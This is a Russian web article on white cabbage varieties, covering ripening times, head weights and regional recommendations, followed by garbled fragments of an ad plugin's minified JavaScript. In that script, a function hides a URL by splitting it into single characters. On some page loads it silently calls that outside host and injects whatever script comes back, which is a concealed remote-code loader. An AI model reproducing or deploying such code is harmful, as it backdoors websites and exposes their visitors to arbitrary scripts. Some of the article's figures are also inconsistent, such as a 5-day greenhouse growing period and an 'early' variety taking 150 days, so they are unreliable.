4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Какие существуют сорта белокочанной капусты

Какие существуют сорта белокочанной капусты

У белокочанной капусты существует много разновидностей. Чтобы вырастить хороший урожай, садоводу важно разбираться во всех видах овоща. Лучшие сорта белокочанной капусты представлены ранними видами.

Сорта белокочанной капусты

Разновидности сортов

Знание сортов белокочанной капусты помогает садоводам определиться, какой из них лучше подойдет для местности. Ранние разновидности подходят для закваски и засолки. Есть и капуста, предназначенная для долгого хранения.

Существует культуры, выведенные специально для выращивания на определенной территории. Например, сорта, способные без потерь выдержать перепады температур и весенние заморозки, или виды белокочанной капусты, долгое время обходящиеся без влаги.

Чтобы получить хороший урожай, садоводу необходимо выбрать качественный семенной материал, вовремя его посадить и оказать ему должный уход.

Для посева семян белокочанной капусты садоводы применяют финские кассеты. Под каждое растение используют отдельные емкости, что исключают риск их травмирования при пересадке.

Ранние

Ранние сорта капусты белокочанной отлично подходят для готовки свежих салатов. Срок их хранения — не более 3-4 месяцев.

Кудесница

Раннеспелый гибрид f1 со сроком вызревания кочанов от 50 до 60 дней. Урожай сорта получают в два захода. Первую посадку семя осуществляют в первой декаде апреля, второй — во второй декаде июня. Кочаны плотные, сочные, их масса — от 2,5 до 3 кг. Кудесницу выращивают для употребления в свежем виде, а также для дальнейшей переработки.

Ринда

Один из самых популярных гибридов данного вида. Он отлично растет на Урале, неприхотлив и требует совсем немного ухода.

Казачок

Казачок созревает примерно через 30-35 дней после посадки рассады в открытый грунт. Если сажать семена, период созревания занимает около 2 месяцев. Капуста Казачок имеет светло-зеленый свет, мягкий вкус. Кочаны хорошие, твердые, крупные, красивой формы. Гибрид неприхотлив и не требует особого ухода. Болезням он также не подвержен, холода переносит хорошо.

Июньская

Июньский гибрид — еще один не менее популярный вид белокочанной капусты, произрастающий в России. Урожай собирают примерно через 60 дней после высаживания семян. Разновидность выдерживает весенние заморозки и длительное хранение.

Атрия f1

Этот сорт белокочанной капусты созревает в течение 150 дней. Кочаны достигают массы до 3,5-4 кг. Вид устойчив к заболеваниям и морозам, не растрескивается, отлично растет в средней полосе России.

Спринт

Кочаны устойчивы к растрескиванию

Урожай снимают примерно через 80 дней после появления первых всходов. Масса такой капусты чуть больше 1 кг. Кочаны созревают примерно в одно время, они устойчивы к растрескиванию и хорошо переносят транспортировку. Такие разновидности капусты особенно любят садоводы, которые предпочитают выращивать несколько кочанов для домашнего употребления и недлительного хранения.

Симпатия

Симпатия вырастает примерно через 95-100 дней после появления всходов. Максимальная масса кочанов — примерно 2 кг. Данная разновидность хорошо транспортируется, не растрескивается при перевозке, имеет мягкий вкус, не горчит.

Популярные голландские сорта

Голландские урожайные сорта белокочанной капусты нетребовательны к уходу и устойчивы к погодным условиям. Килоустойчивые голландские гибриды выращивают как в Подмосковье, так и на Урале и в Сибири.

Бранко

Первый сорт имеет название Бранко. Кочан вида круглый, крупный и плотный. При этом вкус универсален — плод подойдет как для приготовления свежих салатов, так и для засолки и закваски. Собранный урожай хранится долгое время. Разновидность среднеспелая.

Кабтон

Кабтон — еще один популярный скороспелый сорт голландцев. Он набрал популярность благодаря высокой урожайности даже в условиях жаркого и засушливого лета. Кочаны идеальны для квашения, но хранится недолго.

Менди

Менди хранится до полугода, хорошо переносит засуху, холода, дает обильный урожай плотных, красивых и тугих кочанов.

Ринда

Кочерыжка у разновидности Ринда маленькая, сам кочан плотный, листья сочные и вкусные, не имеют привкуса горечи.

Средние сорта и гибриды белокочанной капусты

Среднеспелые сорта отличаются урожайностью

Хорошие среднепоздние и среднеспелые сорта капусты белокочанной имеют гораздо больше урожайных видов, нежели ранние.

Слава 1305

Среднеспелый сорт Слава 1305 хорошо растет в засушливых районах и практически не требуют полива. Кочан созревает за 100 дней. Урожай получается обильный, сами плоды — плотными. Еще один плюс такого сорта — устойчивость к вирусным и грибковым заболеваниям, в том числе к слизистому бактериозу.

Слава Грибовская

Второй среднеспелый сорт — Слава Грибовская. Засуха и недостаток полива для этого сорта не проблема, поэтому он идеально подходит для садоводов, которые не готовы уделять большое количество времени уходу за данной овощной культурой.

Слава Грибовская созревает через 120 дней после высадки рассады в открытый грунт. Вес кочана — примерно 2,5 кг, иногда чуть больше.

Княгиня

Примерно через 120 дней после посадки вырастает и урожай сорта Княгиня. Вес кочана — 3-3,5 кг. Урожай хранят примерно 4 месяца, он подходит для квашения и приготовления свежих салатов. Данный вид белокочанной капусты устойчив к растрескиванию и хорошо переносит длительную транспортировку.

Новые сорта

Новые сорта белокочанной капусты — хорошие гибриды, обладающие устойчивостью к болезням и неблагоприятным погодным условиям.

Капуста Июньская F1

Ультраскороспелая разновидность, предназначенная для употребления только в свежем виде, потому что имеет мягкий, сладкий и сочный вкус без характерной кислинки или горечи. Калибр — до 2 кг.

Этот вид капусты не растрескивается, хороший урожай с него получают через 55-60 дней после появления первых ростков.

Килоустойчивые сорта

Килоустойчивые сорта тоже относят к новым видам овощных культур. Так принято называть сорта, устойчивые к киле — распространенному заболеванию данного овоща. Сюда относят следующие разновидности: Ладожская, Зимняя Грибовская 13, Московская поздняя. Согласно описанию, они не устойчивы к морозам и требуют тщательного ухода.

Лучшие сорта

Лучшие сорта отличаются отличным вкусом

К лучшим сортам белокочанной капусты относят овощи, имеющие сочный и мягкий вкус без горчинки. Они не требуют особого ухода, а в результате можно получить твердые кочаны округлой формы, при этом они не растрескиваются.

Выбор следует остановить на районированных видах, которые выведены с учетом той или иной местности (ее погодных условий, влажности, количества осадков и тд).

Для северных регионов

Сибирь диктует свои условия для садоводов, не каждый сорт способен принести здесь хороший урожай. Какие районированные сорта лучше всего выбрать для Сибири? Современная селекция предлагает 15 гибридов для этого местности. В эту группу входят ранние, среднеспелые и среднепоздние сорта:

  • Белорусская 455;
  • Фарао;
  • Сателит;
  • Валентина;
  • Экспресс;
  • Томас;
  • Рамада;
  • Фаворит;
  • Вьюга;
  • Надежда;
  • Сибирячка;
  • Полярный К-206;
  • Слава 1305;
  • Юбилейный f1;
  • Зимняя Грибовская.

Для Подмосковья и Урала

Из ранних видов для Подмосковья подходит Стахановка, из среднеспелых — Слава, Подарок, из поздних — Амагер. Для Урала идеален сорт капусты Июньская, Стахановка. Для Украины подходят сорта Супер казачок, Гермес.

Лучший сорт белокочанной капусты со средним сроком созревания — Адема или Калибро. Среднепоздние гибриды — Бригадир, Адаптер. У всех вышеперечисленных сортов отмечают высокие товарные качества.

Обзор лучших сортов белокочанной капусты с фото и описанием

Многие дачники и огородники по особенному ценят качественные свойства белокочанной капусты. Поэтому этот вид овощной культуры является одним из самых часто выращиваемых на грядках и огородах.

Как отмечают историки, впервые белокочанную капусту начали сажать еще в 4 веке до н.э. За долгий период она видоизменялась, хотя до 2 года н.э. насчитывалось около 5 разновидностей. В основном, новые сорта капусты белокочанной появились только в начале ХХ века. Именно тогда началась активная селекционная работа.

На сегодняшний день можно выделить лучшие сорта белокочанной капусты по различным показателям и свойствам. Перед тем, как выбрать необходимый вид крупно-кочанного овоща, нужно четко определить, для чего он нужен. Следует отметить, что ранние, средние и поздние сорта белокочанной капусты предназначены для разных потребительских целей.

Например, ранняя капуста не хранится долго, очень хорошая и нежная на вкус, имеет устойчивость к стрелкованию. Она предназначена для летнего потребления в свежем виде, или для приготовления иных блюд. Лучшим сортом для этого считается Золотой гектар. Сорта, которые дозревают позже, могут дольше храниться, также обладают устойчивостью к высоким летним температурам, средней степенью лежкости.

Поздние сорта следует планировать для длительного хранения. Развиваются они медленно. Вегетационный период проходит без особого ухода (необходимо только вовремя вносить удобрения и поливать). Они имеют устойчивость к холодам и вредителям. Также предназначены поздние сорта капусты белокочанной для квашения. Их часто выращивают предприниматели для продажи в зимнюю часть года.

Какие же сорта капусты белокочанной (см. фото с названием) следует выбирать для получения хорошего урожая и удовлетворения своих потребностей?

Лучшие сорта белокочанной капусты:

  • Малахит. Является самым ранним сортом салатной белокочанной капусты. Имеет небольшие головки. Вес одной из них не превышает двух килограмм. Очень сочная и раскидистая капуста. Структура умеренно плотная. Кочан твердый. Хорошо выращивается в умеренном и теплом климате. Любит частые поливы. Растет быстро. Если высаживать в теплице, срок вегетации может сократиться до 5 суток.
  • Таурус F1. Популярный ранний сорт капусты белокочанной. Дачники очень любят выращивать его на своем огороде, поскольку плоды за короткий промежуток времени и при соблюдении всех правил и принципов выращивания, достигает веса около 6 кг. Среди преимущественных свойств следует отметить устойчивость ко многим заболеваниям и вредителям. Период вегетации длиться до 100 дней. Сорт белокочанной капусты Таурус F1 можно выращивать в условиях умеренного климата.
  • Добровольская. Один из самых урожайных, сочных и сладких сортов. Вес одной головки может достигать рекордных 8 кг. В среднем собирают плоды весом 5 кг. Относится к категории среднеспелых сортов капусты белокочанной. Среднеспелая капуста употребляется в пищу и предназначена для приготовления многих блюд. Ее выращивают на продажу агротехнические предприятия. Многие сорта имеют хорошие показатели лежкости. Уникальность сорта в том, что он наделен природными свойствами защиты от многих болезней и вредителей. Благодаря этому, дачник может рассчитывать на высокие показатели урожайности. Сроки хранения капусты Добровольская составляют почти полгода (до 5 месяцев).
  • Подарок. Овощ очень вкусный, сочный и питательный, обладает пряной изюминкой. Его легко распознать среди иных сортов, так, как поверхность зеленых листков имеет незначительный восковый налет. Вес одного плода не превышает 4 кг. Преимущество сорта Подарок в том, что он хорошо поддается транспортировке, не теряя формы при этом. Широко применяется для маринований и квашения на зиму. Многие позиционируют как, самый лучший сорт капусты белокочанной среднего созревания.
  • Краутман F1. Гибридный сорт, который отличается плотной структурой плода, весом до 5 кг., имеет мелкую кочерыжку. Кочаны не растрескиваются даже под резкими изменениями погодных условий. Вкусный, приятный овощ отлично подходит для комплексных засолок, консерваций и квашений. Является одним из килоустойчивых сортов белокочанной капусты.
  • Женева. Отменный позднеспелый сорт, сроки созревания — до 140 суток. Один из самых ранних среди поздних сортов. Обладает множеством преимуществ (хорошая лежкость, не повреждается во время роста, имеет плотную структуру, транспортабельна). Может храниться до сбора нового урожая.
  • Московская поздняя. Описание сорта капусты белокочанной Московская поздняя позволит каждому дачнику понять, почему именно она является одной из самых лучших. Следует только озвучить параметры ее кочанов — они могут достигать веса в 8-10 кг. Розетка у головки крупная и довольно раскидистая. Плод имеет округло-плоскую форму. Имеет устойчивость к многим заболеваниям, особенно к киле. Относительно морозостойкий сорт, который может переносить минусовую температуру до 5 0 С. Хорошо храниться до нового урожая. Кочаны плотные, потому легко их транспортировать. Это лучший поздний сорт белокочанной капусты. Самые лучшие региональные сорта капусты белокочанной

Согласно опыту дачников и рекомендациям селекционеров, сорта и гибриды капусты белокочанной необходимо подбирать под климатические зоны. Они наделены отменными свойствами, позволяющими выдерживать определенные условия и хорошо плодоносить в отдельных регионах.

Исходя из этого, лучшими сортами белокочанной капусты для Подмосковья являются:
  • Скороспелые — Дюма F1, Барокко F1.
  • Ранние — Трансфер F1, Заря.
  • Средние — Менза F1, Подарок.
  • Поздние — Крюмон F1, Амагер.

Лучшие сорта капусты белокочанной для Сибири и для Урала:

  • Ранние – Июльская, Заря.
  • Средние – Юбилейный F1, Слава 1305.
  • Поздние – Крюмон F1, Женева F1.

Лучшие сорта белокочанной капусты для Украины:

  • Ранние – Супер Казачок F1, Увертюра F1, Гермес F1.
  • Средние – Адема F1, Тарас F1, Калибро F
  • Поздние – Московская поздняя, Бригадир F1, Адаптер F1.

Большинство дачников выбирают гибридные сорта. Большой спрос на такие сорта капусты белокочанной (семена и рассаду) объясняется высокими показателями урожайности и качеством плодов. Следует отметить, что украинские селекционные предприятия не отмечаются особой активностью, поэтому огородники отдают предпочтение белорусским, российским и голландским сортам капусты белокочанной.

Почему важно соблюдать региональное распределение при выборе сорта? Районирование позволяет дачнику лучше всего подобрать себе подходящий сорт капусты для выращивания в своем регионе, в соответствии с климатическими условиями и рядом факторов (почва, влажность, наличие холодов).

Региональное распределение не означает, что нельзя выращивать сорта для Подмосковья в украинских областях, или же уральские — в Подмосковье. Районирование сортов влияет непосредственно на урожайность. Попросту дачник получит меньший урожай. Иногда можно не дождаться нормального развития растения. В этом случае необходимо создавать соответствующие условия в парниках и стационарных теплицах.

Какие сорта белокочанной капусты лцчше всего выращивать, видео

ТОП 40 лучших сортов капусты белокочанной с описанием и характеристиками

Белокочанную капусту с успехом растят в любых регионах России. Для холодных областей это одна из культур, хорошо плодоносящая без укрытия, не требующая затрат на теплицы. Немалые сроки хранения капусты обеспечивают использование в свежем виде круглый год. Рассмотрим, каким сортам и гибридам белокочанной капусты стоит отдать предпочтение, чтобы получить хороший урожай.

Преимущества выращивания белокочанной капусты

Основным преимуществом выращивания культуры является ее поразительная холодостойкость, которая делает возможным получение достойного урожая в любых погодных условиях. Рассада, прошедшая закалку, не погибает при похолодании до -4-6 °, вегетация продолжается при положительных температурах, близких к нулевым. Оптимальной температурой выращивания считается 18-20 °.

Капуста содержит набор микроэлементов (Ca, Mg, K, Fe) и витаминов разных групп. Обладает важным свойством – витамины сохраняются после квашения естественным брожением. Белокочанную капусту выращивают с древних времен по всему миру. В России она занимает до четверти всех площадей, отведенных огородным культурам. Белокочанная капуста проходит полный цикл вегетации за 2 года. В первый сезон она дает кочан, семена из сортовых культур получают на следующий год.

Основные требования агротехники – высокая влажность почв (75 %) и воздуха, полноценный дренаж. Высокие температуры вредят капусте, при жаре в 35 ° плоды мелкие, часто не образуются вообще.

Классификация сортов по срокам созревания

Срок созревания – важная часть характеристики любой культуры. Он характеризует не только время, необходимое для завершения образования кочана и наступления спелости, но и способы употребления. Используя сортовое разнообразие белокочанной капусты, можно обеспечить себя урожаем с начала лета и создать запасы и заготовки на зимний период.

Раннеспелые культуры

К раннеспелым относят виды белокочанной капусты, вегетация которых завершается за 110 суток. Основной особенностью этих культур является некрупный кочан, не отличающийся высокой плотностью. Ранние виды спеют в первой трети лета, в них много полезных веществ, поддерживающих организм до появления других огородных культур. В начале сезона приятно похрустеть свежей капустой, ее используют в салатах.

Эти виды белокочанной капусты не занимают много места на огородах и не слишком требовательны к составу почв. После освобождения площади до осени можно успеть вырастить еще одну культуру.

Трансфер F1

Гибридный вид раннего созревания, готов уже через 100 дней. Небольшие кочаны (до 1.5 килограмма) довольно рыхлые, края листа волнистые, прилегают неплотно. Семена от гибрида Трансфер не получают. Чтобы получить ранний урожай, готовят рассаду. Хорошо растет в любом регионе.

Июньская

В описании сорта указана высокая холодостойкость (до -5 °). Кочаны с близко расположенными листьями, весят до 2 килограммов. На срезе – зеленовато-белая, душистая и сочная. Капусту Июньскую нужно своевременно срезать.

Точка

Капуста Точка вырастает за 106-108 дней. Округлые вилки растут дружно, спеют одновременно. На кислых почвах рост замедляется. Капуста Точка сибирской селекции хорошо растет в большинстве регионов.

Казачок F1

Гибрид с названием Казачок появился в 1996 году. Созревание происходит за 100-110 дней, вилки вырастают чуть больше килограмма, на срезе – желто-белые. Производитель семян рекомендует срезать вилок сразу после созревания, гибрид растрескивается на грядках.

Номер первый грибовский 147

Готовность плодов – 60-80 дней, созревание по-настоящему раннее. При соблюдении рекомендованных сроков высадки (первая декада мая) хрустеть капустой можно к середине июня. Вилки круглые, слегка приплюснутой формы. Зреют дружно, срезать нужно сразу, так как растрескиваются при перезревании. Используют для весенних салатов и приготовления первых и вторых блюд.

Стахановка

Кочаны особой плотностью не славятся, дорастают до 3.5 килограмма. Готовность наступает за 100-125 дней. Плоды Стахановки, выросшие на севере страны, квасят, но долго заготовка не хранится.

Малахит F1

Некрупные кочаны гибрида Малахит лежат долго и транспортируются без потерь. При длительном нахождении в почве не трескаются. Созревают за 100-135 дней. Вкус – сладкий, хороша в салатах, используется для диетических блюд.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};